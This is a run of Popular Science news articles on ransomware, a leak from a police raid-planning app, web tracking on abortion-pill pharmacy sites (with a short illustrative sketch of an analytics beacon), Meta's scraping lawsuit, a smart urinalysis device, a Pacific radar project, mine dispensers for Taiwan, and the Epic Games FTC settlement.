“The DOJ’s announcement today sheds light on how different groups were responsible for compromising machines (using everything from stolen passwords to phishing), building the ransomware toolkit, and administering the payment schemes,” Ghosemajumder told PopSci via email. Ghosemajumder says that although many still conjure images of lone hackers causing digital havoc, the public should be far more aware of increasingly complex networks of bad actors.

[Related: Hackers could be selling your Twitter data for the lowball price of $2.]

“Their revenue sharing scheme between cybercriminal groups reminds me of how we did revenue sharing at Google,” he writes, adding that organizations like Hive “are clearly mimicking legitimate businesses in many ways.”

Unfortunately, experts caution that this rare victory against ransomware gangs won’t put a wholesale end to Hive participants’ activities. Although the FBI maintains its investigations are ongoing and arrests are likely imminent, the decentralized, largely anonymous nature of these sorts of organizations ensures their ability to reform into new structures and campaigns over time. “In the grand scheme of things, it probably won’t put Hive out of business, but it’s about attrition and cost,” Jen Ellis, a co-chair of the cybersecurity industry partnership, Ransomware Task Force, told NBC News on Thursday.

“The complexity and scale of cybercrime today goes far beyond anything society has seen in the physical world, so it’s hard for most people to have intuition for how it works or how to deal with it,” adds Ghosemajumder.

For now, however, at least some of the most concerted efforts to extort individuals and organizations online appear stymied, which could provide a much-needed reprieve from the digital landscape’s near-constant cybersecurity threats.

This app helped police plan raids. Hackers just made the data public. https://www.popsci.com/technology/odin-intelligence-data-hack/ Mon, 23 Jan 2023 17:00:00 +0000 https://www.popsci.com/?p=506968
Homeless campsite downtown Los Angeles, California.
Controversial law enforcement apps are at the center of a new, massive data hack. Deposit Photos

The trove reportedly includes thousands of audio recordings, photos, and reports.

The post This app helped police plan raids. Hackers just made the data public. appeared first on Popular Science.


The information dissemination and transparency collective Distributed Denial of Secrets (DDoSecrets) released a 19GB data trove over the weekend that hackers culled from apps law enforcement agencies use to conduct raids and arrests, including operations targeting houseless populations. The mass of ODIN data reportedly includes thousands of audio recordings, photos, reports, and user info, alongside evidence linking ODIN’s CEO and founder to actual police operations.

The drop comes just days after news first broke that SweepWizard, a raid-coordination app developed by ODIN Intelligence, accidentally left sensitive information about hundreds of police operations publicly accessible. Hackers defaced the company’s official website barely a week later.

[Related: Privacy advocates are worried about a newly unveiled pee-analysis gadget.]

ODIN’s founder and CEO Eric McCauley appeared to downplay the potential security flaw first reported by Wired on January 11. But hacktivists soon took advantage of the exploit, replacing the entire website with a single page of plain text graffiti alongside a message explaining their reasoning.

The perpetrators remain unknown, and claim that “all data and backups” for ODIN Intelligence “have been shredded,” although the data wipe has yet to be confirmed, according to TechCrunch. ODIN’s website is offline as of writing. SweepWizard is also currently pulled from the Apple App Store and Google Play.

According to DDoSecrets, some of that information appears to be intentionally inaccurate, such as listing officer names as “Captain America,” “Superman,” and “Joe Blow” alongside false phone numbers. Additionally, some of the dataset’s reports specifically name ODIN’s founder and his wife as participants in law enforcement operations via ODIN’s parent company, EJM Digital. According to Vice on Friday, McCauley was even listed as “commanding officer” in some of the reports.

[Related: Hackers could be selling your Twitter data for the lowball price of $2.]

In addition to the houseless population tracking data, the leak includes reams of information scraped from ODIN’s Sex Offender Notification and Registration (SONAR) app, which is frequently used by state and local police for remote sex offender tracking and management. One file also contains user login information, including two FBI email addresses.

The law enforcement tech company has long been criticized for its products and privacy evasion tactics. Last year, Motherboard reported that its “ODIN Homeless Management Information System” employed facial recognition technology to collect information on individuals, with a marketing brochure claiming that police used it to “identify even non-verbal or intoxicated individuals.” The tools were advertised in commercial materials as offering solutions to managing “problems” such as “degradation of a city’s culture,” “poor hygiene,” and “unchecked predatory behavior.”

Websites selling abortion pills are sharing sensitive data with Google https://www.popsci.com/health/abortion-pill-data-google/ Fri, 20 Jan 2023 02:00:00 +0000 https://www.popsci.com/?p=506360
While many think that health information is legally protected, U.S. privacy law does little to constrain the data that companies such as Google and Facebook can collect. DepositPhotos

Some sites selling abortion pills use technology that shares information with third parties like Google. Law enforcement can potentially use this data to prosecute people.

The post Websites selling abortion pills are sharing sensitive data with Google appeared first on Popular Science.


This article was originally featured on ProPublica.

ProPublica is a Pulitzer Prize-winning investigative newsroom. This story is part of its series Post-Roe America: Abortion Access Divides the Nation.

Online pharmacies that sell abortion pills are sharing sensitive data with Google and other third parties, which may allow law enforcement to prosecute those who use the medications to end their pregnancies, a ProPublica analysis has found.

Using a tool created by The Markup, a nonprofit tech-journalism newsroom, ProPublica ran checks on 11 online pharmacies that sell abortion medication to reveal the web tracking technology they use. Late last year and in early January, ProPublica found web trackers on the sites of at least nine online pharmacies that provide pills by mail: Abortion Ease, BestAbortionPill.com, PrivacyPillRX, PillsOnlineRX, Secure Abortion Pills, AbortionRx, Generic Abortion Pills, Abortion Privacy and Online Abortion Pill Rx.

These third-party trackers, including a Google Analytics tool and advertising technologies, collect a host of details about users and feed them to tech behemoth Google, its parent company, Alphabet, and other third parties, such as the online chat provider LiveChat. Those details include the web addresses the users visited, what they clicked on, the search terms they used to find a website, the previous site they visited, their general location and information about the devices they used, such as whether they were on a computer or phone. This information helps websites function and helps tech companies personalize ads.

But the nine sites are also sending data to Google that can potentially identify users, ProPublica’s analysis found, including a random number that is unique to a user’s browser, which can then be linked to other collected data.
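
That browser-unique random number behaves like an analytics client ID: minted once, stored in a first-party cookie, and attached to every subsequent hit, which is what makes separate visits linkable. A simplified Python sketch of the mechanism (the format loosely mimics a classic Google Analytics `_ga` value; this is an illustration, not Google’s actual code, and the URLs are invented):

```python
# Illustrative sketch of how an analytics "client ID" links a browser's visits.
import random
import time

def new_client_id() -> str:
    # Random number plus first-seen timestamp, set once and reused on every visit.
    return f"{random.randint(0, 2**31 - 1)}.{int(time.time())}"

def build_hit(client_id: str, page: str, referrer: str) -> dict:
    # Every page view carries the same client ID, so distinct pages viewed
    # by one browser become linkable into a single profile.
    return {"cid": client_id, "dl": page, "dr": referrer}

cid = new_client_id()
hit1 = build_hit(cid, "https://pharmacy.example/pills", "https://search.example")
hit2 = build_hit(cid, "https://pharmacy.example/checkout", "")
print(hit1["cid"] == hit2["cid"])  # True
```

Because the same identifier rides along on both hits, anyone holding the collected data can tie a product page view to a later checkout by the same browser.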

“Why in the world would you do that as a pharmacy website?” said Serge Egelman, research director of the Usable Security and Privacy Group at the International Computer Science Institute at the University of California, Berkeley. “Ultimately, it’s a pretty dumb thing to do.”

Representatives for the nine sites did not respond to requests for comment. All were recommended on the popular website Plan C, which provides information about how to get abortion pills by mail, including in states where abortion is illegal. Plan C acknowledged that it does not have control over these sites or their privacy practices.

While many people may assume their health information is legally protected, U.S. privacy law does little to constrain the kind or amount of data that companies such as Google and Facebook can collect from individuals. Tech companies are generally not bound by the Health Insurance Portability and Accountability Act, known as HIPAA, which limits when certain health care providers and health plans can share a patient’s medical information. Nor does federal law set many limits on how companies can use this data.

Law enforcement can obtain people’s data from tech companies such as Google, whose privacy policies say the companies reserve the right to share users’ data with law enforcement. Google requires a court order or search warrant, which law enforcement can obtain with probable cause to believe a search is justified. The company received more than 87,000 subpoenas and search warrants in the U.S. in 2021, the most recent year available; it does not provide a breakdown of these requests by type, such as how many involved abortion medication.

In a statement, Steve Ganem, product director of Google Analytics, said: “Any data in Google Analytics is obfuscated and aggregated in a way that prevents it from being used to identify an individual and our policies prohibit customers from sending us data that could be used to identify a user.”

Google pledged last year that it would delete location history data related to people’s visits to abortion and fertility clinics, but the company has not announced any changes since then related to data involving abortion pill providers or how it handles government requests for data. A Google spokesperson did not respond when asked whether the company has turned over any data to law enforcement about users of online pharmacies that provide abortion medication or whether it has been asked to do so.

“This is problematic and dangerous — both the potential access that law enforcement has to figure out who is violating our new state bans and that we’ve let tech companies know so much about our private lives,” said Anya Prince, a law professor at the University of Iowa who focuses on health privacy. “It shows us how powerful this data is in scary ways.”

Medication abortion

Using medications to induce an abortion involves taking two drugs. Mifepristone blocks the hormone progesterone, effectively stopping the growth of the pregnancy. Misoprostol, taken a day or two later, helps the uterus contract, emptying it of pregnancy tissue. This drug combination is the most commonly used method of abortion, accounting for more than half of abortions in the U.S.

Demand for the drugs is expected to grow amid reproductive health clinic closures and the enactment of a cascade of state laws banning abortion since the Supreme Court overturned Roe v. Wade last June.

At least 13 states now ban all methods of abortion, including medication abortion, though some allow exceptions for medical emergencies, rape or incest. People who are unable to shoulder the cost of traveling to states where abortion is legal are increasingly turning to online pharmacies to buy abortion pills without prescriptions. The mail-order pills can be taken at home, and they’re generally cheaper than abortion services provided in clinics — about $200 to $470 from online pharmacies, compared to about $500 for a first-trimester abortion conducted in a clinic.

Approved by the U.S. Food and Drug Administration in 2000, mifepristone — the first tablet in the two-step regimen — can be used to help end pregnancies in their first 11 weeks. The agency initially restricted the drug, requiring patients to get it from clinicians in person.

Mifepristone became more accessible during the COVID-19 pandemic, when the FDA temporarily relaxed the requirement that people visit providers in person to get the drug. The agency scrapped the requirement altogether in December 2021, allowing people to obtain abortion medication through the mail after a telemedicine appointment.

Then, on Jan. 3, the FDA published new rules allowing retail pharmacies to dispense mifepristone to people who have prescriptions, potentially expanding access to medication abortion. But those rules do not help pregnant people in more than a dozen states where abortion bans prevent pharmacies from offering the drug.

A week later, Alabama’s attorney general said that anyone using abortion pills could be prosecuted under a state law that penalizes people for taking drugs while pregnant — despite the state’s abortion ban, which excludes abortion seekers and penalizes providers instead. He then appeared to back off his statement, saying the law would be used only to target providers.

Nineteen states already ban the prescription of abortion drugs through telehealth, meaning people in those states must see a clinician in person or find abortion medication online on their own. Many appear ready to do the latter. After a draft of the Supreme Court’s abortion decision leaked last May, internet search traffic for medication abortion surged. Dozens of people have posted descriptions online of their experiences getting abortion pills, some in restrictive states. One Reddit user recounted their ordeal on an abortion subgroup in October: “I’m in TX so i ordered through abortion RX. It said it’ll be here soon like 5-6 days. I’m extremely nervous I’m doing this by myself, but I’ve looked and don’t have a lot of time to make a decision. This is the fastest way.”

Just two states — Nevada and South Carolina — explicitly outlaw self-managed abortion. But that hasn’t stopped prosecutors in other states from charging people for taking abortion drugs.

Prosecutors have cited online orders of abortion pills as evidence in cases charging people with illegal abortions in several states, including Georgia, Idaho and Indiana. And in at least 61 cases from 2000 through 2020 spread across more than half the states in the country, prosecutors investigated people or ordered their arrest for allegedly self-managing abortions or helping someone else to do so, according to a report by If/When/How, a reproductive justice advocacy organization. In most of these cases, people had used medication for their abortions.

Those prosecutors interested in criminalizing abortion are aided by state and private surveillance.

“This is an entirely new era,” said Ari Waldman, a professor of law and computer science at Northeastern University. “We’re moving to a modern surveillance state where every website we visit is tracked. We have yet to conceptualize the entire body of laws that could be used to criminalize people getting abortions.”

Law enforcement can use people’s behavior on websites that sell abortion pills as evidence to build cases against those suspected of having abortions. Investigations and charges in these cases overwhelmingly stem from reports to law enforcement by health care providers or trusted contacts, or from the discovery of fetal remains, legal experts say. Once authorities launch an investigation, they can use online searches for abortion pills as part of the evidence.

“This information can tell a district attorney that you went to an abortion website and you bought something,” Waldman said. “That might be enough to get a judge to get a warrant to take someone’s computer to search for any evidence related to whatever abortion-related crime they’re being charged with.”

This was true even under the more limited abortion restrictions under Roe. For example, in 2017, prosecutors in Mississippi charged Latice Fisher with second-degree murder after she lost her pregnancy at 36 weeks. Prosecutors used her online search history — including a search for how to buy abortion pills online — as evidence. Fisher’s murder charge was eventually dismissed.

“We have a private surveillance apparatus that is wide and is largely unregulated,” said Corynne McSherry, legal director at the Electronic Frontier Foundation, a nonprofit that promotes digital rights. “Now Google knows what you’re searching. This is a real threat. If any third party has your information, it means your data is no longer in your control and it could be sought by law enforcement. This is 100% a worry.”

Opting out

Many people aren’t aware of how to opt out of sharing their data. Part of the problem is that once an online pharmacy shares a visitor’s information with a third party such as Google, that information is governed by the third party’s privacy policy, which may permit disclosure to law enforcement.

“The mere fact that you’ve used the online pharmacy to buy abortion medication, that info is now collected by Google and it is now subject to the privacy policy of Google such that you have no way of opting out of that, because it’s entirely separate from the website you went to,” Waldman said.
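To make that data flow concrete, here is a hedged sketch of the kind of “pageview” beacon a page running Google Analytics (via the Universal Analytics Measurement Protocol) reports back to Google. The parameter names (`v`, `tid`, `cid`, `t`, `dl`) are real Measurement Protocol fields; the tracking ID, client ID, and pharmacy URL below are invented for illustration.

```python
from urllib.parse import urlencode

def analytics_beacon(tracking_id, client_id, page_url):
    """Build the URL of a Measurement Protocol 'pageview' hit."""
    params = {
        "v": "1",            # protocol version
        "tid": tracking_id,  # the site's Google Analytics property ID
        "cid": client_id,    # pseudonymous ID tying hits to one browser
        "t": "pageview",     # hit type
        "dl": page_url,      # full URL of the page the user visited
    }
    return "https://www.google-analytics.com/collect?" + urlencode(params)

# Hypothetical IDs and URL, for illustration only.
url = analytics_beacon("UA-12345-6", "555.123",
                       "https://example-pharmacy.test/checkout/mifepristone")
print(url)
```

Note that the `dl` field carries the full page URL, which is how the mere act of visiting a checkout page can end up in a third party’s records.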

Users can install a web browser, such as Brave or Firefox, that offers privacy protections. They can also install browser extensions to block third-party trackers and adjust the privacy settings on their browsers. But these steps aren’t always foolproof. Tech companies can still subvert them using hidden tools that users cannot see, and they likely retain vast troves of data that are beyond users’ control.

“Individuals are not going to solve this problem; technical solutions aren’t going to solve this problem,” said Chris Kanich, associate professor of computer science at the University of Illinois at Chicago. “These trillion-dollar companies of the economy aren’t going anywhere. So we need policy solutions.”

Congressional lawmakers have spent years discussing a national data privacy standard. The bill that has made the most progress is the American Data Privacy and Protection Act. Introduced last June by a bipartisan group of lawmakers who intended to strengthen consumer data protections, the bill limited companies from using any sensitive data, including precise geolocation information or browsing histories, for targeted advertising or other purposes. Companies would have been required to get consumers’ express consent before sharing sensitive data with third parties. The legislation passed out of its assigned House committee in July.

Another bill, the My Body, My Data Act, also introduced last summer, would limit the reproductive health data that companies are allowed to collect, keep and disclose.

But neither bill has passed. The My Body, My Data Act had few, if any, Republican supporters. Plus, legislators couldn’t reach an agreement over whether the American Data Privacy and Protection Act should supersede state privacy laws such as the California Consumer Privacy Act of 2018, which provides data privacy protections for consumers in the state.

Privacy experts say the most effective way to protect users’ data is for online pharmacies that sell abortion medication to stop collecting and sharing health-related data.

Companies selling abortion pills should immediately stop sharing data with Google, said Cooper Quintin, senior staff technologist at the Electronic Frontier Foundation.

“Web developers may not have thought they were putting their users at risk by using Google Analytics and other third-party trackers,” Quintin said. “But with the current political climate, all websites, but especially websites with at-risk users, need to consider that helping Google, Facebook and others build up records of user behavior could have a potentially horrific outcome. You can’t keep acting like Roe is still the law of the land.”

The post Websites selling abortion pills are sharing sensitive data with Google appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

Meta sues data-scraping firm for selling user data to LAPD https://www.popsci.com/technology/meta-data-scraping-lawsuit/ Fri, 13 Jan 2023 22:00:00 +0000 https://www.popsci.com/?p=505517
Meta logo on company office building
Voyager Labs’ data-scraping tactics affected over 600,000 users. Deposit Photos

Voyager Labs created fake users to amass info on over 600,000 real people, which it then sold to the LAPD for criminal profiling.

The post Meta sues data-scraping firm for selling user data to LAPD appeared first on Popular Science.


Meta announced yesterday that it is pursuing legal action against a data scraping-for-hire firm called Voyager Labs for allegedly “improperly” amassing Facebook and Instagram users’ publicly available information, which the firm then sold to organizations including the Los Angeles Police Department. As The Verge and other outlets note, the LAPD used the data trove to compile profiles of potential future criminals, a strategy whose methodology and algorithms critics have repeatedly denounced as reductionist, unethical, and racist.

Public knowledge of Voyager Labs’ tactics can be traced back to November 2021 via a report from The Guardian, but Meta only recently instigated a wholesale ban of the company alongside more than 38,000 fake user profiles from its social media platforms, according to a legal complaint filed on Thursday. Using a proprietary software system, Voyager Labs allegedly launched multiple campaigns utilizing false accounts spread across a diverse computer network in various countries to hide its activity. From there, Meta claims, Voyager Labs amassed “profile information, posts, friends lists, photos and comments” from over 600,000 users. Those datasets were then sold to third-party buyers, such as the LAPD, for their own purposes.

[Related: Meta will pay $725 million for a single Cambridge Analytica privacy settlement.]

In its legal complaint, Meta alleges that Voyager Labs violated the company’s Terms of Service against fake accounts, alongside unauthorized and automated scraping. Voyager Labs also conducted similar strategies on other platforms including Twitter, Telegram, and YouTube, according to the lawsuit.

“We cannot comment on this aspect of the legal action,” a spokesperson for Meta told PopSci.

Situations like the alleged Voyager Labs scheme are difficult for even the biggest tech giants, including Meta, to handle. Legal cases can move notoriously slowly, and all the while the offending companies can continue their potentially illegal tactics, often emboldened by the perceived inaction. Previously, Meta launched similar legal action against a different data-scraping company, Octopus, for amassing information on over 350,000 Instagram users.

Meta is seeking a permanent injunction against the company, as well as restitution for “ill-gotten profits in an amount to be proven at trial.” The request does not specify whether Meta users affected by Voyager Labs’ actions will be included in the compensation.

Privacy advocates are worried about a newly unveiled pee-analysis gadget https://www.popsci.com/technology/withings-urinalysis-device-medical-privacy/ Thu, 12 Jan 2023 20:00:00 +0000 https://www.popsci.com/?p=504945
Door open revealing public restroom toilet
There doesn't appear to be anything stopping U-Scan from sharing info with police. Deposit Photos

Consumers should think twice before buying into the splashy new device.

The post Privacy advocates are worried about a newly unveiled pee-analysis gadget appeared first on Popular Science.


We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

One of the odder, buzzier gadgets to come out of this year’s CES conference was undoubtedly the U-Scan, an in-home, WiFi-connected urinalysis device from the health tech company Withings, meant to read one’s urine composition for health factors including pH balance, nutrition, and even users’ menstrual cycles. Many are (understandably) eager to poke fun at the French company’s gadget as an arguably inevitable turn in the ever-expanding smart home tech industry, but some critics are already voicing serious concerns about the lavatory accessory.

“The U-Scan is a body surveillance device that indefinitely stores your private health data, including information about pregnancy and fertility,” writes Caitlin Seeley George, campaign director for the digital privacy rights advocacy group, Fight for the Future.

[Related: Meta could protect users’ abortion-related messages whenever it wants, advocates say.]

George continued via email with PopSci about the grave ramifications that could befall U-Scan owners—alongside its makers’ potential complicity in prosecution. “In anti-abortion states, your urine logs could qualify as evidence in efforts to criminalize abortion seekers,” George explains.

On Withings’ legal policy page, the company notes that it “may be compelled by the law to disclose your personal data to some authorities or other third parties, such as the law enforcement or legal authorities.”

“This isn’t innovation: it’s just another surveillance tool cloaked by convenience rhetoric,” she adds.

Smart home health devices and online privacy are increasingly coming to the forefront of privacy discussions, especially following last year’s historic annulment of Roe v Wade by the US Supreme Court. In August, documents surfaced which showed how Facebook’s parent company, Meta, provided Nebraska law enforcement the private messages sent between a mother and her teen daughter as they planned and carried out an at-home abortion past the state’s 20-week limitation.

[Related: What science tells us about abortion bans.]

George notes that it is easy to envision similar situations occurring with data obtained and stored by U-Scan’s software, and reminds consumers that such health information is not always covered by HIPAA regulations. “U-Scan is not concerned with protecting your personal information, and the company’s openness about how it will share data with law enforcement should be enough to stop anyone from using it,” she writes, criticizing the rise of smart tech that sacrifices privacy for the sake of supposed convenience.

“There is nothing convenient about personal health data being hacked or shared with police,” says George.

PopSci has reached out to U-Scan’s makers at Withings about its stance on cooperation with law enforcement. There does not appear to be any mention of the subject on Withings’ data security page.

A new radar installation in the Pacific will let US forces look over the horizon https://www.popsci.com/technology/us-building-over-the-horizon-radar-palau/ Thu, 05 Jan 2023 23:00:00 +0000 https://www.popsci.com/?p=503542
A C-130 lands on Angaur Island in Palau in November, 2022.
A C-130 lands on Angaur Island in Palau in November, 2022. US Air Force / Divine Cox

So far, the Department of Defense is being fairly tight-lipped about the project in Palau. Here's what we know.

The post A new radar installation in the Pacific will let US forces look over the horizon appeared first on Popular Science.


On December 28, the Department of Defense announced the award of a $118 million contract to build a special kind of radar installation in the Republic of Palau. Palau is a nation in the Pacific, about 800 miles southwest of Guam and about 1,000 miles southeast of Manila. It will, by 2026, be host to the Tactical Mobile Over-the-Horizon Radar, a new sensor about which the military is being fairly tight-lipped.

The late December announcement mentions only the concrete foundations that will support the installation. A February 2018 budget document notes that the Tactical Mobile Over-the-Horizon Radar, or TACMOR, “will support air domain awareness and maritime domain awareness requirements over the Western Pacific region. The project will demonstrate a sub-scaled over-the-horizon radar (OTHR) that is one quarter the size of traditional [Over The Horizon] systems.”

The installation, as outlined, will have two sites. One will be along a northern isthmus of Babeldaob, the largest island in Palau. The other will be on Angaur, an island about 60 miles south. These two sites will need to have communications between them, suggesting that the complex could be one linked sensor array. Site schematics show the Babeldaob location as a transmit site, with Angaur as a receiver site. 

Department of Defense documents, as well as general US planning and policy, increasingly point to the western Pacific as a potential future battlefield for the United States. Guam, a territorial possession of the United States since the Spanish-American War of 1898, routinely houses bombers that may be tasked with flights to North Korea or China. One of the major challenges of fighting in the Pacific is that the ocean is vast, and in any war that lasts more than a few hours (unlike a nuclear exchange, which might not), being able to find, track, and attack enemy forces will be a vital component of victory.

That desire to see beyond, in order to better fight, is a driver of over-the-horizon radar.

Beyond line of sight

Radar, while capable of seeing far, is a technology bound by the physics of waves traveling in straight lines. A radio wave needs to hit an object in a direct line from where it emanates in order to reflect back, and the timing and direction of the returning echo make the signal. This is partly why radar is so useful for tracking planes, which travel above the ground and can thus be detected at greater distances, without the curve of the Earth in the way. It is also why radar installations are often mounted high above the ground, as every few feet of added height increases how far they can see.
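The height-versus-range tradeoff can be put in rough numbers. The sketch below is a back-of-the-envelope estimate (not anything from the article), using the standard radar-horizon approximation with a 4/3 effective Earth radius to account for atmospheric refraction bending radio waves slightly around the curve:

```python
import math

# Distance to the radar horizon grows with the square root of
# antenna height:  d ~ sqrt(2 * k * R * h)
# R = Earth's radius, k = 4/3 models standard atmospheric refraction.
EARTH_RADIUS_M = 6_371_000
K_REFRACTION = 4 / 3

def radar_horizon_km(antenna_height_m):
    """Approximate line-of-sight radar horizon, in kilometers."""
    return math.sqrt(2 * K_REFRACTION * EARTH_RADIUS_M * antenna_height_m) / 1000

for h in (10, 30, 100):
    print(f"antenna at {h:>3} m -> horizon ~{radar_horizon_km(h):.0f} km")
```

Even a 100-meter mast only pushes the horizon out to roughly 40 kilometers for surface targets, which is why seeing ships a thousand kilometers away requires getting around line-of-sight entirely.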

The Cold War drove early research and deployments of over-the-horizon radars, which were used as a way to try and watch for incoming missile and bomber attacks. So how do they typically work? 

One example comes from a Soviet over-the-horizon radar receiver, named Duga, that was built outside of Chernobyl, in Ukraine. Shortwave radio signals sent from transmitter sites in southern Ukraine would bounce off the ionosphere, allowing the signal to travel much further, and would then be detected and interpreted at the Duga site. The Soviet radar signal could be heard on shortwave radios, and radio hobbyists in the United States dubbed it the “woodpecker” for its distinctive pattern.

Another approach to sending radar over the horizon is to use low-frequency signals and send them along the surface, letting diffraction carry the waves further. This surface wave radar has a range of hundreds of kilometers, while techniques bouncing off the ionosphere can perceive the world thousands of kilometers away. 
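As a rough illustration of why ionospheric bounce buys so much range, the geometry below estimates the maximum ground distance covered by a single hop off a reflecting layer at height h, assuming the wave leaves the antenna nearly parallel to the ground. The layer heights are typical textbook values for the ionosphere, not anything specific to TACMOR or Duga.

```python
import math

EARTH_RADIUS_KM = 6371

def max_single_hop_km(layer_height_km):
    """Maximum one-hop ground range for a wave reflecting at the
    given layer height, launched at a grazing (near-zero) angle."""
    r = EARTH_RADIUS_KM
    return 2 * r * math.acos(r / (r + layer_height_km))

for name, h in (("E layer", 100), ("F2 layer", 300)):
    print(f"{name} at {h} km -> max one-hop range ~{max_single_hop_km(h):.0f} km")
```

A single bounce off the higher F2 layer reaches on the order of 4,000 kilometers, consistent with the "thousands of kilometers" figure above, and multiple hops can extend that further.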

In Ukraine, the distance between the Duga transmitter and receiver sites is over 300 miles. In Palau, the distance between the tactical over-the-horizon radar’s transmitter and receiver sites will be roughly one sixth of that. If TACMOR is built on similar principles, the shorter baseline might suggest a shorter surveillance range. Duga was designed to warn of nuclear launches. The TACMOR site will instead track different threats, on a different scale.

See the sea

TACMOR appears built for a different kind of role than the globe-spanning over-the-horizon radars of the Cold War. Instead of looking for the first sign of nuclear oblivion, TACMOR will track movements related to battle, and will presumably do so at a fraction of the cost of deploying crewed ships and aircraft patrols to scan the same area.

“A modern OTHR [over-the-horizon radar] on Palau will be able to support space-based and terrestrial-based sensor and weapon systems for the potential cueing and early warning of incoming hypersonic weapons, cruise missiles, ballistic missiles, enemy aircraft, and ships,” reports The War Zone. “Most of all, OTHR allows for persistent monitoring of specific areas that would otherwise require many types of radar systems forward deployed over a huge area on the ground, in the air, and at sea at any given time, which may not even be possible.”

By putting the radar system in Palau, the Department of Defense will be able to increase its awareness of a vast swath of sea in the region, and in turn, keep an eye on an important slice of the Pacific. With luck, the radar will report nothing to worry about, but should danger arrive, having the sensor in place means the Navy and Air Force can respond with advance warning, should they need to. 

Why the US is selling Volcano Mine Dispensers to Taiwan https://www.popsci.com/technology/us-selling-taiwan-volcano-mine-dispenser-systems/ Wed, 04 Jan 2023 21:30:03 +0000 https://www.popsci.com/?p=503137
A Volcano Mine Dispenser in action in Poland in 2020 during an exhibition.
A Volcano Mine Dispenser in action in Poland in 2020 during an exhibition. US Army / Greg Stevens

The systems can quick deploy anti-tank mines across a large field.

The post Why the US is selling Volcano Mine Dispensers to Taiwan appeared first on Popular Science.


To better defend Taiwan in the face of a potential invasion, the United States is selling it Volcanos. More precisely, the United States is selling Taiwan the Volcano Mine Dispenser, a system that can rapidly hurl anti-tank landmines, creating a dangerous and impassable area for heavy armor. The Volcano is an older system, but its use in Taiwan would be brand-new, indicating the kinds of strategies that Taiwan and the United States are considering when it comes to how to defend the island nation in the future.

Land mines are a defensive weapon, though one that can certainly be used aggressively. Putting a landmine in place imperils all who would pass through the area, forcing attackers to face immediate danger or slow down their advances as they reroute around the hazard. What the Volcano does, specifically, is allow for the defenders to create a minefield rapidly. 

“Using a ground vehicle, a 1,000-meter minefield can be laid in 4 to 12 minutes based on terrain and vehicle speed,” reads an Army description. The Volcano system’s mines can also be deployed by helicopter, and it can deploy anti-personnel mines, but the announcement from the State Department specifically mentions trucks for carrying and mounting the Volcano systems it is selling Taiwan, and mentions anti-tank mines. 

Enemy mine

Every landmine is an explosive designed to detonate in the future. Anti-personnel landmines, as the name suggests, are used to kill people, and are prohibited by international treaties in part because of the threat they pose to civilians during and after war. (The United States is only party to some of the treaties regarding land mines.)

Anti-tank landmines have detonation thresholds that are harder to accidentally set off with anything except a vehicle, and are targeted squarely at the largest and deadliest vehicles on a battlefield. In addition, to ensure that the anti-tank mines are used for battlefield purposes, rather than permanently delineating a fixed border, their detonation fuses can be programmed to not work after a set amount of time. 

“A Soldier-selectable, self-destruct mechanism destroys the mine at the end of its active lifecycle – 4 hours to 15 days – depending on the time selected,” declares the Army.

This fits into the larger role of mines as tools to change how battles are fought, rather than create static fronts. In the announcement authorizing the sale, the mines are referred to not as mines but as “munitions,” the broader category of all explosives fired by weapons. With the ability to cover an area, and then have that area be littered in active explosives for over two weeks, one way to think of the Volcano is as artillery designed to send explosives forward in both space and time. 

Island time

As Russia’s invasion of Ukraine illustrated, landmines can have a major impact on how and where armies fight. Ukraine borders Russia by land, and even before the February 2022 invasion, the country had leftover explosives littering the landscape, posing a threat to life and limb. After the invasion, both sides used explosive barriers to limit how and where their foes could safely move. Placing landmines can be quick, while clearing landmines without loss of life or equipment usually needs specialized tools and time.

Taiwan’s unique position as an island nation gives it a meaningful physical barrier to hostile takeover. Unlike Russia into Ukraine, China cannot simply roll tanks over the border. An invasion of Taiwan, should the government of mainland China decide to undertake it, would have to be an amphibious affair, landing soldiers and vehicles by ship as well as attacking from the sea and sky. 

“I think we’ve been very clear in the United States over multiple administrations, that Taiwan needs to put its self-defense front and center. We think the Chinese put a premium on speed,” said Deputy Secretary of Defense Kathleen Hicks at a security forum in December.

“And the best speed bump or deterrent to that is really the Taiwan people being able to demonstrate that they can slow that down, let alone to defend against it,” Hicks continued. “And that’s where the Ukraine example, I think, really can give the Chinese pause to see the will of a people combined with capability to stall or even stop a campaign of aggression.”

The Volcano is not the flashiest of tools for stopping an invasion by sea, but it does give Taiwan’s military options for how to stop invading forces once they have landed. By being able to place deadly, explosive barriers to movement where they’re needed, for likely as long as they’re needed, the Volcano can halt and restrict advances. It makes the assault into a mess of impassable terrain, blunting attacks with an eruption of explosive power.

‘Fortnite’ owner agrees to $520 million FTC settlement in messy child privacy case https://www.popsci.com/technology/epic-games-fornite-520-million-ftc-settlement-child-privacy/ Tue, 20 Dec 2022 21:00:00 +0000 https://www.popsci.com/?p=500765
Gamer playing Fortnite on laptop using video game controller
Two separate fines add up to a record-shattering sum for Epic Games. Tristan Fewings/Getty Images for Hamleys

Epic Games was also accused of engaging in 'dark pattern' in-app purchase schemes.

The post ‘Fortnite’ owner agrees to $520 million FTC settlement in messy child privacy case appeared first on Popular Science.



Epic Games has agreed to pay over $520 million as part of a multi-record-breaking settlement with the Federal Trade Commission. Per the FTC, the makers of the massively popular video game Fortnite were accused not only of tricking players into making unintentional in-game payments, but also of violating children’s privacy as defined in the Children’s Online Privacy Protection Act (COPPA). The settlement comes without Epic Games admitting or denying the FTC’s allegations.

Although technically free to play, much of Fortnite’s profits stem from in-game purchases for digital perks like character dance moves, virtual concerts, and costumes. The FTC alleges that Epic Games relied on a marketing strategy known as “dark patterns,” which The Wall Street Journal described on Monday as “tactics that trap customers into paying for goods and services and create obstacles to canceling.”

[Related: A parent’s guide to playing Fortnite with your kids.]

Additionally, the FTC argued that Epic Games routinely collected the personal data of children under 13 years old without their parents’ consent or knowledge through Fortnite, which counts as many as 400 million users globally. According to the esports betting platform Thunderpick, over a quarter of the game’s players are estimated to reside in the US. Fortnite’s previous live-by-default setting for in-game audio and text chatting is said to have also adversely affected teens and children, who could be subject to harassment, bullying, or predatory behavior.

Epic Games will pay a $275 million penalty over accusations of violating COPPA stipulations, the largest ever fine for an FTC rule violation, alongside $245 million in customer refunds over accusations of its dark pattern strategies—itself the largest refund in a gaming case. As part of the settlement, Epic agreed to what the FTC calls its largest ever administrative order to change a company’s consumer policy. Epic Games adopted strict new default privacy guidelines for children and teens in September 2022, which turned off voice and text communications unless manually changed in Fortnite’s settings. Any previous user data collected by Epic in violation of COPPA regulations must be deleted, unless parents explicitly express consent otherwise.

[Related: Social media scammers made off with $770 million last year.]

